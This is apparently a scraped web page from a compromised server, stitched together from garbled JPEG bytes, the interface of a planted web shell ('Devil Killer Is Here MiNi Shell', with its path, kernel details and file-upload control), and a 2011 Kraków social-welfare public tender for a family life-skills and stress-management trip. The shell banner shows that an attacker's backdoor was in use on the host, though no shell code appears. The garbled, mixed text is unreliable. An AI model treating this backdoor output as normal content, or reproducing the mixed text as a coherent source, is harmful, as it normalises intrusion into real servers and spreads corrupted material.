JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111119/302391-N-2011.html

<p class="kh_header"><b>Kraków: Przeprowadzenie treningu kompetencji życiowych dla uczestników Programu Aktywności Lokalnej</b><br>
<b>Numer ogłoszenia: 302391 - 2011; data zamieszczenia: 19.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie treningu kompetencji życiowych dla uczestników Programu Aktywności Lokalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie treningu kompetencji życiowych dla uczestników Programu Aktywności Lokalnej, zgodnie z poniższymi wytycznymi:
1.	Ilość uczestników: ogółem 80 osób w tym:
1)	40 osób dorosłych (rodzice),
2)	20 osób w wieku 18-24 lat (młodzież),
3)	5 dzieci w wieku od 0 do 5 lat,
4)	15 dzieci w wieku od 6-17 lat, w tym 1 dziecko poruszające się na wózku inwalidzkim.
5)	4 osoby ze strony Zamawiającego (psycholog, pedagog , animator lokalny, pracownik      socjalny).
2.	Sposób organizacji zajęć:
1)	Zajęcia będą prowadzone oddzielnie dla  3 grup uczestników (maksymalnie 20 osób w grupie): 1 grupa dla rodziców, 2 grupy dla młodzieży  
2)	W trakcie zajęć Wykonawca umożliwi przeprowadzenie konsultacji indywidualnych z psychologiem   -  zgodnie z potrzebami uczestników warsztatów, w wymiarze nie większym niż 28 godzin zegarowych.
3)	W trakcie zajęć Wykonawca umożliwi przeprowadzenie konsultacji indywidualnych z pedagogiem - zgodnie z potrzebami uczestników warsztatów, w wymiarze nie większym niż 7 godzin, 
4)	Zajęcia będą prowadzone w formie wykładów oraz metodami aktywnymi: dyskusja, wchodzenie w role, praca w grupie.
3.	Wykonawca przeprowadzi zajęcia według poniższej specyfikacji:

Nazwa usługi	Forma	Odbiorca	Łączna ilość godzin
Trening kompetencji społecznych - warsztaty antystresowe - 3 psychologów ze strony wykonawcy	Zajęcia grupowe	2 grupy dorosłych,
1 grupa młodzieży w wieku 15-24 lata	8,5 na grupę
Poradnictwo specjalistyczne psychologiczne - 3 psychologów ze strony wykonawcy, 1 psycholog ze strony zamawiającego	Zajęcia indywidualne	Wszyscy uczestnicy	Maksymalnie 28 godzin. W zależności od potrzeb uczestników w ramach limitu
Trening kompetencji społecznych - nauka i trening zachowań w miejscach publicznych	Zajęcia grupowe	Wszyscy uczestnicy	8 godzin zajęć (w tym 3 godziny warsztatów w trakcie których będzie zorganizowany grill oraz 5 godzin zajęć w terenie ( wyjście poza teren ośrodka  w 3 dniu warsztatów)
Poradnictwo specjalistyczne pedagogiczne - 1 pedagog ze strony zamawiającego	Zajęcia indywidualne	Wszyscy uczestnicy	Maksymalnie 7 h
W zależności od potrzeb uczestników w ramach limitu ( zapewnienie sali do konsultacji )
Opieka nad dziećmi - 1 pedagog ze strony wykonawcy, 1 pedagog ze strony zamawiającego	Zajęcia grupowe	2 grupy dzieci do 14 roku życia	14,5 h na grupę - łącznie 29 godzin


4.	Wytyczne dotyczące realizacji miejsca zamówienia:
1)	warsztaty  należy zorganizować w miejscowości górskiej o charakterze turystyczno-wypoczynkowym, w odległości do 150 km od Krakowa (poza terenem powiatu krakowskiego) 
2)	zakwaterowanie w ośrodku wypoczynkowym, szkoleniowym tj. hotel, pensjonat, gospodarstwo agroturystyczne lub prywatne kwatery; 
3)	stołówka musi mieścić się w budynku zakwaterowania,  
4)	nie dalej niż 200 m od budynku powinno znajdować się  zadaszone miejsce na ognisko lub grill wraz z miejscami do siedzenia dla każdego uczestnika; 
5)	Wykonawca zapewni dostęp do basenu z obsługującym go ratownikiem, z którego uczestnicy będą mogli korzystać bez ponoszenia dodatkowych opłat w wymiarze minimum 1 godziny na osobę w trakcie pobytu. Basen powinien znajdować się w odległości do 500 m od miejsca zakwaterowania. W przeciwnym wypadku, Wykonawca zapewni transport uczestników do danego obiektu.
6)	ośrodek musi dysponować  pokojami 1, 2, 3, 4 osobowymi,  z łazienkami,  w tym 4 pokoje jednoosobowe dla przedstawicieli Zamawiającego. Pokoje winny być wyposażone w łóżka jednoosobowe  wraz z kompletem  pościeli, do każdego łóżka przynależna szafka lub minimum 1 półka w szafie na uczestnika;
7)	ośrodek musi dysponować 1 pokojem 3-osobowym, o standardzie określonym w pkt 6, dostosowanym dla osób poruszających się na wózkach inwalidzkich. Dostęp do tego pokoju, jak  również z pokoju na stołówkę musi być pozbawiony barier architektonicznych. 
8)	ośrodek musi dysponować trzema salami do zajęć grupowych,  dostępne w wymiarze po 8,5h w trakcie wyjazdu - zgodnie z ustalonym harmonogramem zajęć - każda na min. 20 osób, układ sali umożliwiający przeprowadzenie warsztatów tj. ułożenie krzeseł w półkole/okrąg, przestrzeń na ćwiczenia ruchowe itp. Wyposażenie każdej z sal: tablica typu flipchart z markerami ( 4 x czarny, 2 x niebieski, 2x zielony, 2x czerwony), 1 ryza papieru białego A4 do drukarki, możliwość wydrukowania lub kserowania materiałów do zajęć.
9)	ośrodek musi dysponować 5 pokojami do zajęć indywidualnych (4 dla psychologów i 1 dla pedagoga); 
10)	ośrodek musi dysponować 1 salą do zajęć dla dzieci wraz z wyposażeniem w zabawki, gry planszowe i materiały plastyczne, miejscem  do odpoczynku.   
11)	ośrodek musi dysponować 1 salą na przygotowanie posiłków (śniadania, kolacje), wraz z wyposażeniem niezbędnym do ich przygotowania dostępnym po 1 godzinie rano i wieczorem w drugim dniu pobytu oraz rano w  trzecim dniu pobytu, mieszczącą co najmniej 80 osób lub 2 salami mieszczącymi co najmniej 40 osób.
12)	w razie potrzeby Wykonawca zapewni opiekę pielęgniarską lub opiekę lekarską polegającą na wezwaniu lekarza do ośrodka lub dowiezieniu uczestnika pobytu do przychodni/szpitala. Wszelkie koszty pomocy lekarskiej pokrywa wykonawca. 
13)	przedstawicielom Zamawiającego Wykonawca zapewni pełny zakres świadczeń (analogicznie jak dla beneficjentów).
14)	w odległości maksymalnie 30 km od ośrodka  musi znajdować się atrakcja turystyczna (np. muzeum, zamek, kopalnia itp.).
15)	w przypadku, gdy w miejscowości zakwaterowania jest pobierana opłata klimatyczna, Wykonawca opłaci ją we własnym zakresie. 

5.	Wytyczne dotyczące realizacji programu zajęć w trakcie wyjazdu:
Przygotowanie konspektu zajęć (harmonogram na poszczególne dni)  i ich przeprowadzenie z uwzględnieniem zajęć dla młodzieży prowadzonych równolegle z zajęciami dla rodziców, równolegle z zapewnieniem opieki dla dzieci uczestników, zgodnie z celem wyjazdu, tj. przeprowadzenia zajęć budujących kompetencje społeczne w ramach:
1)	warsztatów radzenia sobie ze stresem w rodzinie - zajęcia grupowe dla 1 grupy młodzieży i 2 grup rodziców,
2)	Opieki nad dziećmi podczas zajęć rodziców,
3)	wyjścia w celu podniesienia kompetencji społecznych - nauka i trening zachowań w miejscach publicznych jako forma kształtowania kompetencji społecznych i umiejętności korzystania z oferty kulturalnej. Zajęcia grupowe dla rodzin w formie gry terenowej. W przypadku niekorzystnych warunków atmosferycznych Wykonawca zorganizuje wycieczkę do atrakcji turystycznej. Czas trwania gry terenowej / wycieczki: 5 godzin zegarowych.

6.	Wytyczne dotyczące realizacji warsztatów radzenia sobie ze stresem w rodzinie - zajęcia grupowe dla młodzieży (zajęcia prowadzone równolegle do zajęć dla rodziców) - 1 grupa młodzieży - 1 osoba prowadząca:
1)	Liczba godzin przypadająca na grupę - 6 godzin zegarowych,
2)	Program treningu będzie ukierunkowany na realizację następujących celów:
a)	nauka rozpoznawania źródeł stresu
b)	nauka technik zmniejszania negatywnych skutków stresu 
c)	nauka technik efektywnego zarządzania własną energią
d)	kształtowanie odporności na stres
3)	Zakres tematyczny warsztatów:
a)	stres - prawdy i mity, stres pozytywny i negatywny
b)	rozpoznawanie źródeł stresu w rodzinie i szerszym środowisku
c)	następstwa stresu w rodzinie
d)	profilaktyka  i zmniejszanie negatywnych skutków stresu - kształtowanie odporności na stres.
e)	mądre zarządzanie własną energią
f)	poznawanie i rozwijanie własnych umiejętności emocjonalnych
4)	Zajęcia obejmują:
a)	ćwiczenia interpersonalne,
b)	praktyczną naukę technik zmniejszania negatywnych skutków stres,
c)	techniki relaksacyjne,
d)	techniki oddechowe.

7.	Wytyczne dotyczące realizacji usługi - warsztaty radzenia sobie ze stresem - zajęcia grupowe dla rodziców (zajęcia prowadzone równolegle do zajęć dla młodzieży) - 2 grupy dorosłych po 1 osobie prowadzącej na grupę:
1)	Liczba godzin przypadająca na grupę  - 6 godzin zegarowych;
2)	Program treningu będzie ukierunkowany na realizację następujących celów:
a)	nauka rozpoznawania źródeł stresu
b)	nauka technik zmniejszania negatywnych skutków stresu 
c)	nauka technik efektywnego zarządzania własną energią
d)	kształtowanie odporności na stres
3)	Zakres tematyczny warsztatów:
a)	stres - prawdy i mity, stres pozytywny i negatywny
b)	rozpoznawanie źródeł stresu w rodzinie i szerszym środowisku
c)	następstwa stresu w rodzinie
d)	profilaktyka  i zmniejszanie negatywnych skutków stresu - kształtowanie odporności na stres.
e)	mądre zarządzanie własną energią
f)	poznawanie i rozwijanie własnych umiejętności emocjonalnych
4)	Zajęcia obejmują:
a)	ćwiczenia interpersonalne,
b)	praktyczną naukę technik zmniejszania negatywnych skutków stres,
c)	techniki relaksacyjne,
d)	techniki oddechowe.

8.	Wytyczne dotyczące realizacji usługi - Opieka nad dziećmi beneficjentów (1 osoba ze strony Wykonawcy, 1 osoba ze strony Zamawiającego):
1)	Odbywać ma się podczas uczestniczenia rodziców w zajęciach grupowych oraz podczas ich zajęć indywidualnych - zajęcia grupowe 6 godzin i zajęcia indywidualne 1 godzina;
2)	Harmonogram opieki nad dziećmi winien być równoległy do harmonogramu zajęć rodziców;
3)	Zajęcia winny być dostosowane do wieku i możliwości dzieci oraz warunków pogodowych;
4)	Program zajęć dla dzieci: gry i zabawy sportowe, zajęcia plastyczne, projekcja filmów;
5)	Wykonawca zobowiązany jest do zabezpieczenia dla dzieci materiałów plastycznych, dydaktycznych, gier, sprzętu sportowego, wejściówek na zajęcia zorganizowane.

9.	Wytyczne dotyczące realizacji usługi  - wyjście w celu podniesienia kompetencji społecznych:
1)	5-godzinne wyjście w celu podniesienia kompetencji społecznych - nauka i trening zachowań w miejscach publicznych jako forma kształtowania kompetencji społecznych i korzystania z oferty kulturalnej - zajęcia grupowe dla rodzin,
2)	Gra terenowa dla rodzin lub w przypadku niekorzystnych warunków atmosferycznych - zwiedzanie atrakcji turystycznych. 
3)	Wykonawca zapewni nagroda dla zwycięzców gry, tj. ilustrowany przewodnik turystyczny dotyczący zwiedzanego regionu;

10.	Proponowany harmonogram zajęć:

Godzina	Odbiorca zajęć
	Młodzież	Rodzice	Dzieci
Dzień 1
10:00	Zbiórka uczestników - wyjazd z Krakowa
13:00 - 15:30	Przyjazd na miejsce, zakwaterowanie w pokojach, obiad
16:00 - 18:30	Zajęcia integracyjne - poznanie uczestników (prowadzący: psycholog)
	Zajęcia integracyjne - poznanie uczestników (prowadzący: psycholog)
	Opieka nad dziećmi uczestników

18:30 - 21:30	Kolacja - Kontynuacja spotkania integracyjnego przy grillu
19:30-21:30	Poradnictwo indywidualne dla 10 osób (8 osób-psycholog; 2 osoby-pedagog)
	Opieka nad dziećmi z rodzin korzystających z poradnictwa
22:00 - 6:00	Cisza nocna
Dzień 2
8:00 - 9:00	Śniadanie 
10:00 - 12:00	 warsztaty radzenia sobie ze stresem	 Warsztaty radzenia sobie ze stresem	Opieka nad dziećmi uczestników
12:15 - 13:15	Poradnictwo indywidualne dla 5 osób (4 osoby-psycholog; 1 osoba-pedagog)
13:30 - 14:30	Obiad
15:00 - 17:00	 warsztaty radzenia sobie ze stresem	 Warsztaty radzenia sobie ze stresem	Opieka nad dziećmi uczestników
17:00 - 18:00	Basen/ poradnictwo indywidualne dla 5 osób (4 osoby-psycholog; 1 osoba-pedagog)
17:00 - 18:00	Poradnictwo indywidualne dla 5 osób (4 osoby-psycholog, 1 osoba-pedagog)	Opieka nad dziećmi osób korzystających z poradnictwa
18:30 - 19:30	Kolacja  
20:00 - 22:00	Poradnictwo indywidualne dla 10 osób (8 osób-psycholog; 2 osoby-pedagog)	Opieka nad dziećmi osób korzystających z poradnictwa
22:00 - 6:00	Cisza nocna
Dzień 3
8:00 - 9:00	Śniadanie 
10:00 - 12:00	 warsztaty radzenia sobie ze stresem	 Warsztaty radzenia sobie ze stresem	Opieka nad dziećmi uczestników
12:30 - 17:30	Wyjście (wycieczka) w celu podniesienia kompetencji społecznych dla całych rodzin:
- miejska gra terenowa
- obiad

17:30	Zbiórka uczestników - wyjazd do Krakowa
19:00	Przyjazd do Krakowa

11.	Wymogi dot. opieki lekarskiej 
W razie potrzeby Wykonawca zapewni opiekę pielęgniarską lub opiekę lekarską polegającą na wezwaniu lekarza do ośrodka lub dowiezieniu uczestnika pobytu do przychodni/szpitala. Wszelkie koszty pomocy lekarskiej pokrywa Wykonawca. 
12.	Transport
Wykonawca zapewni dojazd uczestnikom z pięciu miejsc na terenie Krakowa, ustalonych z Zamawiającym do miejsca pobytu i z powrotem oraz na wycieczkę  autokarami,  zgodnie z obowiązującymi przepisami dotyczącymi przewozu osób. Autokary  mają posiadać klimatyzację lub możliwość otwierania okien Wykonawca zapewnia sprawdzenie stanu technicznego autokarów przez Policję w dniu wyjazdu (z Krakowa i z miejscowości pobytu). Kierowca musi uzyskać protokół dopuszczenia pojazdu i kierowcy do przewozu osób. Kierowca musi posiadać wymagane przepisami dokumenty m.in. licencję przewoźnika. Wykonawca zapewni autokar sprawny technicznie. Przewoźnik musi posiadać wymagane prawem ubezpieczenia. Kierowca jest zobowiązany do dbania o czystość autokaru podczas podróży (zewnątrz jak i wewnątrz).
13.	Ubezpieczenie
Uczestnicy wyjazdu muszą zostać ubezpieczeni od następstw nieszczęśliwych wypadków  
 w  trakcie przejazdów oraz w trakcie trwania wyjazdu oraz kosztów leczenia na kwotę nie
 mniejszą niż 10 000 tys. złotych na każdego uczestnika. Wykonawca przedłoży
 Zamawiającemu polisę -   umowę ubezpieczenia uczestników wyjazdu nie później niż 48
 godzin przed terminem wyjazdu
14.	Podczas realizacji  usługi Wykonawca zobowiązany jest do:
1)	Prowadzenia dziennika każdych zajęć zawierającego listę obecności( podpisywaną przez Beneficjentów na koniec każdych zajęć), wymiar godzin zajęć, 
2)	Uzyskania potwierdzenia odbioru przez beneficjentów materiałów piśmienniczych, wyżywienia oraz publikacji;  
3)	Przedstawienia szczegółowego programu zajęć, opieki nad dziećmi oraz konspektów zajęć do akceptacji Zamawiającego w terminie do 3 dni po podpisaniu umowy .
4)	Zapewnienia materiałów szkoleniowych dla każdego uczestnika:
a)	planu zajęć 
b)	długopisu metalowego typu zenit; 
c)	bloku biurowego 60 stron kratka A4 
d)	skryptu zawierającego tematy omawiane na zajęciach, wskazówki, porady
5)	Oznaczenia dokumentów wytworzonych w związku z realizacją zadania, materiałów, pomieszczeń  w których odbywać się będą zajęcia itp., zgodnie z wytycznymi oznaczania projektów POKL, zamieszczonymi na stronie internetowej www.efs.gov.pl/ZPFE/Strony/Dokumenty.aspx;
6)	Wydania po zakończeniu realizacji usługi zaświadczeń oznakowanych zgodnie z wytycznymi POKL,
7)	Prowadzenia dokumentacji fotograficznej usługi i przekazania jej na zakończenie całej usługi Zamawiającemu ;
8)	Zachowania w tajemnicy wszelkich danych osobowych, do których uzyskał dostęp w związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy o ochronie danych osobowych.

15.	Ustalenia dodatkowe:
1)	Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez Zamawiającego lub podmiot kontrolujący Zamawiającego;
2)	W pomieszczeniach, w których będą odbywać się zajęcia będzie panować temperatura pokojowa;
3)	Pokoje w których będą zakwaterowani beneficjenci będą dla nich dostępne do momentu wyjazdu z ośrodka.

16.	Wyżywienie - menu na 1 osobę:
1)	Serwis kawowy  podczas zajęć dorosłych i młodzieży
kawa -250 ml
herbata - 250 ml
woda mineralna  - butelka 0,5 l 
soki owocowe 100%/ jabłkowy, pomarańczowy / w dzbankach 250 ml na osobę
ciasteczka konferencyjne - 15 dkg na osobę 
2)	Menu dla dzieci w trakcie opieki w trakcie zajęć  beneficjentów
drożdżówka  - 1 sztuka
serek homogenizowany o różnych smakach - 1 sztuka  - 150 g
soki owocowe 100 %, w zakręcanych butelkach , poj. 330 ml.
woda mineralna - butelka 500 ml
owoc - 1 sztuka (jabłko lub banan) 
3)	Jadłospis (beneficjenci sami będą przygotowywać śniadania i kolacje w formie szwedzkiego stołu)
1 dzień
Obiad:   
zupa pomidorowa z makaronem / 400 ml/
kotlet schabowy, 150 g
ziemniaki  200 g
sałata ze śmietaną, 150 g
banan, 1 sztuka 
herbata lub sok owocowy  250 ml 
Kolacja z grillem:
Mięsa grilowane: karczek wieprzowy- 0,1kg, udko kurczaka- 0,1kg, żeberka- 0,1kg, golonko- 0,1kg
Sosy (musztardowy, chrzanowy, ketchup)- 0,05kg/ łącznie
wybór pieczywa (żytnio-pszenne, razowe- łącznie 0,15kg), 
Napoje (do wyboru)
kawa150 ml + mleczko do kawy
herbata 200 ml + cytryna
soki owocowe 200 ml.
woda mineralna 200 ml

2 dzień
Śniadanie:
Mięsa: karkówka, schab, szynka - 0,1kg/ łącznie
2 rodzaje sałatek warzywnych- 0,1kg/ łącznie
Jogurt owocowy- 150ml
Musli zbożowe - 0,05kg
2 rodzaje serów żółtych (ostry, łagodny, wędzony)- 0,05kg/ łącznie
2 rodzaje twarożku na słodko i na ostro- 0,1kg/ łącznie
ogórek, sałata
warzywa do kanapek (pomidor, ogórek, korniszony) - 0,05kg/ łącznie
wybór pieczywa (żytnio-pszenne, razowe, bułki - łącznie 0,15 kg), 
masło (0,05kg).
Do wyboru: herbata, kawa + mleczko do kawy lub sok owocowy  250 ml 
Obiad:
 	zupa jarzynowa / 400 ml/
 	kotlet rybny  200 g
ziemniaki  200g
surówka z warzyw mieszanych, 150 g
 	jabłko, 1 szt. 
herbata lub sok owocowy  250 ml 
Kolacja:
Mięsa: karkówka, schab, szynka - 0,1kg/ łącznie
2 rodzaje sałatek warzywnych- 0,1kg/ łącznie
Jajko na twardo - 1 szt. 
2 rodzaje serów żółtych (ostry, łagodny, wędzony)- 0,05kg/ łącznie
ogórek, sałata
warzywa do kanapek (pomidor, ogórek, korniszony) - 0,05kg/ łącznie
wybór pieczywa (żytnio-pszenne, razowe, bułki - łącznie 0,15 kg), 
masło (0,05kg).
Do wyboru: herbata, kawa + mleczko do kawy lub sok owocowy  250 ml 
3 dzień
Śniadanie:
Mięsa: karkówka, schab, szynka - 0,1kg/ łącznie
2 rodzaje sałatek warzywnych- 0,1kg/ łącznie
Jogurt owocowy- 150ml
Musli zbożowe - 0,05kg
2 rodzaje serów żółtych (ostry, łagodny, wędzony)- 0,05kg/ łącznie
2 rodzaje twarożku na słodko i na ostro- 0,1kg/ łącznie
ogórek, sałata
warzywa do kanapek (pomidor, ogórek, korniszony) - 0,05kg/ łącznie
wybór pieczywa (żytnio-pszenne, razowe, bułki - łącznie 0,15 kg), 
masło (0,05kg).
Do wyboru: herbata, kawa + mleczko do kawy lub sok owocowy  250 ml 
Obiad: - w trakcie wyjścia integracyjnego dla rodzin
Barszcz z krokietem - 0,25l., krokiet 1szt./0,1kg
pierś z kurczaka faszerowana pieczarkami i żółtym serem- 0,15 kg
z kulkami ziemniaczanymi -0,2 kg, 
zestawem surówek -0,15 kg
     	herbata lub sok owocowy  250 ml 
Suchy prowiant w trakcie wyjścia integracyjnego dla rodzin
Prowiant na 1 osobę: 
2 szt. soczek w kartonie 200 ml; 
2 bułki z szynką, serem żółtym, sałatą i pomidorem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających  stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 63.50.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 11.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca lub podwykonawca musi posiadać wpis do Rejestru Organizatorów Turystyki i Pośredników  Turystycznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować następującymi osobami zdolnymi do wykonania   zamówienia, tj: 
1)	3 osobami  posiadającymi wykształcenie wyższe psychologiczne oraz doświadczenie w prowadzeniu zajęć grupowych dla rodziców i młodzieży w wymiarze co najmniej 8 godzin zegarowych;
2)	1 osobą posiadającą:
a)	wykształcenie wyższe pedagogiczne ze specjalnością wychowanie przedszkolne i opieka nad dzieckiem lub specjalnością przedszkolną i wczesnoszkolną,
b)	doświadczenie w prowadzeniu zajęć dla dzieci lub w sprawowaniu opieki nad dziećmi w wymiarze co najmniej 14 godzin zegarowych. 
Wymóg doświadczenia należy wykazać za okres ostatnich 3 lat przed terminem składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

